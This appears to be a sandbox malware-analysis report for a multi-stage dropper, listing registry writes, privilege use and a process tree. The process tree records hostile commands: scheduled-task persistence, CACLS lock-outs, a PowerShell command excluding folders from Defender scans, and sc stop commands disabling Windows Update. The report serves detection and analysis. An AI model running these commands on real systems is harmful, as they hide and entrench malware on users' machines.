| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-892 = "Morocco Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-281 = "Central Europe Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2141 = "Transbaikal Daylight Time" | C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\A298.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\kos4.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe
"C:\Users\Admin\AppData\Local\Temp\db7da9a9f7e5b436a0d7a82413ad95364c07378989267218e9bab7b9b71e6716.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Users\Admin\AppData\Local\Temp\9EEB.exe
C:\Users\Admin\AppData\Local\Temp\9EEB.exe
C:\Users\Admin\AppData\Local\Temp\A053.exe
C:\Users\Admin\AppData\Local\Temp\A053.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A11F.bat" "
C:\Users\Admin\AppData\Local\Temp\A1EB.exe
C:\Users\Admin\AppData\Local\Temp\A1EB.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
C:\Users\Admin\AppData\Local\Temp\A298.exe
C:\Users\Admin\AppData\Local\Temp\A298.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
C:\Users\Admin\AppData\Local\Temp\A345.exe
C:\Users\Admin\AppData\Local\Temp\A345.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
C:\Users\Admin\AppData\Local\Temp\A4DC.exe
C:\Users\Admin\AppData\Local\Temp\A4DC.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9d81246f8,0x7ff9d8124708,0x7ff9d8124718
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 368 -p 4372 -ip 4372
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4372 -s 784
C:\Users\Admin\AppData\Local\Temp\C4E8.exe
C:\Users\Admin\AppData\Local\Temp\C4E8.exe
C:\Users\Admin\AppData\Local\Temp\C7D7.exe
C:\Users\Admin\AppData\Local\Temp\C7D7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9d81246f8,0x7ff9d8124708,0x7ff9d8124718
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:N"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2604 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\CDE3.exe
C:\Users\Admin\AppData\Local\Temp\CDE3.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2252 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
C:\Users\Admin\AppData\Local\Temp\kos4.exe
"C:\Users\Admin\AppData\Local\Temp\kos4.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3972 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1900 -ip 1900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1900 -s 784
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
C:\Windows\SysWOW64\cacls.exe
CACLS "explothe.exe" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\FEE7.exe
C:\Users\Admin\AppData\Local\Temp\FEE7.exe
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 4268 -ip 4268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 540
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Z1026-1"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -i
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /Query
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
"C:\Program Files (x86)\Drive Tools\zDriveTools.exe" -s
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo Y"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:N"
C:\Windows\SysWOW64\cacls.exe
CACLS "..\fefffe8cea" /P "Admin:R" /E
C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp
"C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp" /SL5="$9005E,6502186,54272,C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4908 -ip 4908
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 572
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2236,10337913212874740691,9991449930873469962,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 /prefetch:8
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
